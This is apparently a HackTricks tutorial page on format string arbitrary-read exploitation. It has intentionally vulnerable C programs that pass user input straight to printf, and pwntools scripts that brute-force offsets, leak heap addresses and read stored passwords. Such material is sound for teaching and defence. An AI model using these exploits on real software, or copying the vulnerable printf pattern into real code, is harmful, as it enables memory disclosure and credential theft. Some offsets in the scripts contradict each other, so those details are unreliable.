7 KiB
Format Strings - Arbitrary Read Example
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Read Binary Start
Code
#include <stdio.h>
int main(void) {
char buffer[30];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
return 0;
}
Compile it with:
clang -o fs-read fs-read.c -Wno-format-security -no-pie
Exploit
from pwn import *
p = process('./fs-read')
payload = f"%11$s|||||".encode()
payload += p64(0x00400000)
p.sendline(payload)
log.info(p.clean())
- The offset is 11 because setting several As and brute-forcing with a loop offsets from 0 to 50 found that at offset 11 and with 5 extra chars (pipes
|
in our case), it's possible to control a full address.- I used
%11$p
with padding until I so that the address was all 0x4141414141414141
- I used
- The format string payload is BEFORE the address because the printf stops reading at a null byte, so if we send the address and then the format string, the printf will never reach the format string as a null byte will be found before
- The address selected is 0x00400000 because it's where the binary starts (no PIE)
Read passwords
#include <stdio.h>
#include <string.h>
char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
int main() {
char stack_password[20] = "secretStackPass"; // Password in stack
char input1[20], input2[20];
printf("Enter first password: ");
scanf("%19s", input1);
printf("Enter second password: ");
scanf("%19s", input2);
// Vulnerable printf
printf(input1);
printf("\n");
// Check both passwords
if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
printf("Access Granted.\n");
} else {
printf("Access Denied.\n");
}
return 0;
}
Compile it with:
clang -o fs-read fs-read.c -Wno-format-security
Read from stack
The stack_password
will be stored in the stack because it's a local variable, so just abusing printf to show the content of the stack is enough. This is an exploit to BF the first 100 positions to leak the passwords form the stack:
from pwn import *
for i in range(100):
print(f"Try: {i}")
payload = f"%{i}$s\na".encode()
p = process("./fs-read")
p.sendline(payload)
output = p.clean()
print(output)
p.close()
In the image it's possible to see that we can leak the password from the stack in the 10th
position:
Read data
Running the same exploit but with %p
instead of %s
it's possible to leak a heap address from the stack at %25$p
. Moreover, comparing the leaked address (0xaaaab7030894
) with the position of the password in memory in that process we can obtain the addresses difference:
Now it's time to find how to control 1 address in the stack to access it from the second format string vulnerability:
from pwn import *
def leak_heap(p):
p.sendlineafter(b"first password:", b"%5$p")
p.recvline()
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
return int(response, 16)
for i in range(30):
p = process("./fs-read")
heap_leak_addr = leak_heap(p)
print(f"Leaked heap: {hex(heap_leak_addr)}")
password_addr = heap_leak_addr - 0x126a
print(f"Try: {i}")
payload = f"%{i}$p|||".encode()
payload += b"AAAAAAAA"
p.sendline(payload)
output = p.clean()
print(output.decode("utf-8"))
p.close()
And it's possible to see that in the try 14 with the used passing we can control an address:
Exploit
from pwn import *
p = process("./fs-read")
def leak_heap(p):
# At offset 25 there is a heap leak
p.sendlineafter(b"first password:", b"%25$p")
p.recvline()
response = p.recvline().strip()[2:] #Remove new line and "0x" prefix
return int(response, 16)
heap_leak_addr = leak_heap(p)
print(f"Leaked heap: {hex(heap_leak_addr)}")
# Offset calculated from the leaked position to the possition of the pass in memory
password_addr = heap_leak_addr + 0x1f7bc
print(f"Calculated address is: {hex(password_addr)}")
# At offset 14 we can control the addres, so use %s to read the string from that address
payload = f"%14$s|||".encode()
payload += p64(password_addr)
p.sendline(payload)
output = p.clean()
print(output)
p.close()
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Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.